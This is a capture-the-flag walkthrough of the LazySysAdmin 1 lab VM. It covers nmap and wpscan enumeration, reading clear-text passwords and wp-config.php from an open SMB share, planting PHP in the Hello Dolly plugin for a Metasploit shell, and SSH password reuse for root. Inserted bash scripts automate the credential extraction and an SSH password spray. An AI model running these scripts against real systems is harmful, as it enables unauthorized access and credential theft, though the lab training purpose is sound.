Walkthrough: LazySysAdmin 1
Author: Agoonie
Date: 2017-10-9
1. Target IP
The VM is set up with a host-only network in VMware Workstation, so the target has to be somewhere in that host-only subnet. I identified its IP with a simple Nmap ping sweep of the range:
nmap -sn -v 192.168.126.2-254
2. NMAP Scan/Service ID
Now, on to the full scan to identify open ports and the services running on them.
I usually start looking at interesting ports while the scan is still going. I took note of ports 80, 139, 445, and 3306: HTTP, NetBIOS/SMB, and MySQL. For port 80, I wanted to enumerate the files and folder structure of the web application. I usually use dirb or DirBuster for that.
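As an added example (not part of the original walkthrough), this is how I would script the recon above so that the open ports drive the follow-up tools instead of being read off the screen: a ping sweep of the host-only range, a full port/service scan saved in Nmap's grepable format, and a parser that pulls the open ports out of that output. The subnet is the one used on this page; the specific target address, service versions and the use of `nmap -oG` are assumptions, and the sample scan output is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not the walkthrough author's code. Host discovery plus full
# service scan of a host-only range, then extraction of the open ports from
# nmap's grepable (-oG) output so dirb/wpscan/smbclient can be aimed at
# exactly what is listening.
set -euo pipefail

# Live functions: these run nmap against the lab and are not executed in the
# offline demo below. 192.168.126.0/24 is the host-only subnet from the page.
ping_sweep() {           # usage: ping_sweep 192.168.126.2-254 -> one live IP per line
  nmap -sn -n "$1" -oG - | awk '/Status: Up/ {print $2}'
}
full_scan() {            # usage: full_scan 192.168.126.x  (writes scan.gnmap)
  nmap -sS -sV -p- -T4 -oG scan.gnmap "$1" >/dev/null
}

# Grepable output carries one "Ports:" field per host whose entries look like
#   port/state/proto/owner/service/rpcinfo/version
# separated by ", ". Print "port/proto service" for every open entry.
open_ports_from_gnmap() {   # usage: open_ports_from_gnmap scan.gnmap
  awk -F'Ports: ' '/Ports:/ {print $2}' "$1" \
    | tr ',' '\n' \
    | awk -F'/' '$2 == "open" {print $1 "/" $3 " " $5}' \
    | sed 's/^[[:space:]]*//'
}

# Comma-separated port list, e.g. for a targeted "nmap -sV -sC -p <list>".
open_port_list() {          # usage: open_port_list scan.gnmap
  open_ports_from_gnmap "$1" | cut -d/ -f1 | paste -sd ',' -
}

# Constructed sample of what full_scan would write; the IP and version strings
# are illustrative, only the port set matches what the walkthrough found
# (plus 22, since SSH is used later on the page).
sample_gnmap() {            # usage: sample_gnmap out.gnmap
  cat > "$1" <<'EOF'
# Nmap scan initiated (constructed sample)
Host: 192.168.126.129 ()  Status: Up
Host: 192.168.126.129 ()  Ports: 22/open/tcp//ssh//OpenSSH/, 80/open/tcp//http//Apache httpd/, 139/open/tcp//netbios-ssn//Samba smbd/, 445/open/tcp//netbios-ssn//Samba smbd/, 3306/open/tcp//mysql//MySQL/  Ignored State: closed (65530)
# Nmap done (constructed sample)
EOF
}

# Offline demo: parse the constructed sample.
demo() {
  local f; f=$(mktemp)
  sample_gnmap "$f"
  open_ports_from_gnmap "$f"
  echo "targeted scan: nmap -sV -sC -p $(open_port_list "$f") 192.168.126.129"
  rm -f "$f"
}
```

Run `demo` to see the five open ports and the follow-up command; against the lab, `full_scan "$(ping_sweep 192.168.126.2-254 | head -n1)"` followed by `open_ports_from_gnmap scan.gnmap` gives the same list for the real target.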
With dirb, I see folders for wordpress and phpmyadmin. I use wpscan to see what I can learn about the WordPress site; it can often enumerate users, plugins, themes, etc.
The scan identified an admin user, the WordPress version, a theme and some links to look at. I noted everything and went on to ports 139 and 445.
Bingo. I am able to see the files in the wordpress folder over the SMB share. If I can connect to it, maybe I can read and write to it. Then it is just a matter of dropping a web shell, escalating privileges, and game over.
No luck. I can only read the files; I cannot write to the folder.
Well, let's read some files.
It looks like the admin put a password in the deets.txt file. What else can we find? Maybe config files in the wordpress folder.
The wp-config.php file might be good: it stores the database user and password in clear text.
Looks like we have an account for the WordPress site. Let's keep track of these creds as well and test them out wherever a login is offered.
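As an added example (not part of the original walkthrough), this script does the wp-config.php step from the SMB share without eyeballing the file: it fetches the file anonymously, pulls out the `DB_*` defines into a ready-to-test credential string, and checks one thing a defender would care about on the same file, whether `DISALLOW_FILE_EDIT` is set. When it is not set, the WordPress admin UI can write straight to plugin and theme files, which matters for what happens with Hello Dolly later on this page. The share name, path and target address are assumptions, and the sample wp-config.php content is constructed.

```bash
#!/usr/bin/env bash
# Added example, not the walkthrough author's code. Pulls wp-config.php off a
# readable SMB share and extracts the clear-text DB credentials plus the
# DISALLOW_FILE_EDIT setting. Host, share and path are assumptions.
set -euo pipefail

# Live: anonymous (-N) read of one file from a share; not run in the demo.
fetch_from_share() {     # usage: fetch_from_share //192.168.126.x/share$ wordpress/wp-config.php out.php
  smbclient -N "$1" -c "get \"$2\" \"$3\"" >/dev/null
}

# Value of define('NAME', 'value') in a PHP config file; empty if absent or
# if the value is not a quoted string.
php_define() {           # usage: php_define NAME wp-config.php
  sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$1['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$2" \
    | head -n1
}

# DB credentials as user:password@host/name, ready for a mysql -u test or
# for reuse against wp-login, phpmyadmin and SSH.
wp_db_creds() {          # usage: wp_db_creds wp-config.php
  printf '%s:%s@%s/%s\n' \
    "$(php_define DB_USER "$1")" "$(php_define DB_PASSWORD "$1")" \
    "$(php_define DB_HOST "$1")" "$(php_define DB_NAME "$1")"
}

# Exit 0 when the built-in theme/plugin editor is disabled, 1 otherwise.
# Without this define, an admin login can edit hello.php from the browser.
file_edit_disabled() {   # usage: file_edit_disabled wp-config.php
  grep -Eq "define\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true" "$1"
}

# Constructed sample wp-config.php; values are illustrative, not the target's.
sample_wp_config() {     # usage: sample_wp_config out.php
  cat > "$1" <<'EOF'
<?php
/* Constructed sample for the example, not the target's real wp-config.php. */
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'S3cretDBpass');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('WP_DEBUG', false);
$table_prefix = 'wp_';
EOF
}

# Offline demo over the constructed sample.
demo() {
  local f; f=$(mktemp)
  sample_wp_config "$f"
  echo "db creds: $(wp_db_creds "$f")"
  if file_edit_disabled "$f"; then echo "plugin editor: disabled"
  else echo "plugin editor: ENABLED (DISALLOW_FILE_EDIT not set)"; fi
  rm -f "$f"
}
```

The hardened counterpart is a single line in wp-config.php, `define('DISALLOW_FILE_EDIT', true);`, and `file_edit_disabled` returns success once it is present.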
The installed plugins are AntiSpam and Hello Dolly. A quick search for Hello Dolly shows that attackers commonly use it to hide backdoors: it ships with every WordPress install as a single file, hello.php, and nobody looks at it.
I assume that means I can just add PHP code to it.
3. Exploit Execution
WordPress accepted and saved the PHP code I added to hello.php. Now I just start a Metasploit multi/handler and browse to hello.php to trigger it.
4. Escalating Privileges
We are running as www-data. How can we escalate? Let's start looking around to see what we can find.
Looks like we have more credentials to take note of. We found the user togie, who is the admin for the WordPress site. Maybe I can start testing the collected creds against his account.
SSH is running on the server, so let's try.
The password 12345 worked for him. Well, he is the admin; maybe he is a sudo user as well?
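As an added example (not part of the original walkthrough), this is the credential-reuse check that actually rooted this box, scripted so it runs before any kernel exploit is considered: list the local accounts that have a real login shell, check whether a compiler is even present (the conclusion below notes gcc and cc were missing), and try every harvested password against every login user over SSH. The target address and the password list are assumptions, `sshpass` is assumed to be installed on the attacking machine, and the sample passwd file is constructed.

```bash
#!/usr/bin/env bash
# Added example, not the walkthrough author's code. Post-foothold triage:
# which accounts to spray harvested passwords at, whether a compiler exists,
# and an SSH spray of user/password pairs. Host and creds are assumptions.
set -euo pipefail

# Local accounts with an interactive shell (from /etc/passwd by default).
# Service accounts on nologin/false are skipped; they cannot SSH in anyway.
login_users() {          # usage: login_users [passwd_file]
  awk -F: '$7 != "" && $7 !~ /(nologin|false|sync|halt|shutdown)$/ {print $1}' \
    "${1:-/etc/passwd}"
}

# Compilers present on this box, one per line. Empty output means local
# exploit sources cannot be built here; compile elsewhere and upload.
compilers_present() {
  local c
  for c in gcc cc clang tcc; do
    command -v "$c" >/dev/null 2>&1 && echo "$c"
  done
  return 0
}

# Live: try every password in a file against every login user over SSH.
# creds file holds one password per line (deets.txt, wp-config.php, ...).
spray_ssh() {            # usage: spray_ssh 192.168.126.x creds.txt [passwd_file]
  login_users "${3:-/etc/passwd}" | while read -r u; do
    while read -r p; do
      if sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
           -o PreferredAuthentications=password -o PubkeyAuthentication=no \
           "$u@$1" 'id' >/dev/null 2>&1; then
        echo "VALID $u:$p"
      fi
    done < "$2"
  done
}

# Constructed passwd sample: the account names follow the page, the rest is
# illustrative. togie is the only non-root user with a login shell.
sample_passwd() {        # usage: sample_passwd out.passwd
  cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
togie:x:1000:1000:togie,,,:/home/togie:/bin/bash
EOF
}

# Offline demo: the users worth spraying, and whether we could build locally.
demo() {
  local f; f=$(mktemp)
  sample_passwd "$f"
  echo "spray targets: $(login_users "$f" | paste -sd ' ' -)"
  echo "compilers here: $(compilers_present | paste -sd ' ' -)"
  rm -f "$f"
}
```

Once a pair is valid, `sudo -l` as that user answers the question above about sudo rights before anything more elaborate is tried.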
Conclusion:
Enumeration was key to rooting this box. I did not screenshot the process, but I tried every privilege-escalation exploit from exploit-db.com that looked applicable, and every one of them failed. In addition, gcc and cc were not present on the box, so I created similar VMs to compile the code and uploaded the executables.
It did not matter. Every time I got a credential, it took me to the next step on the VM. Great boot2root!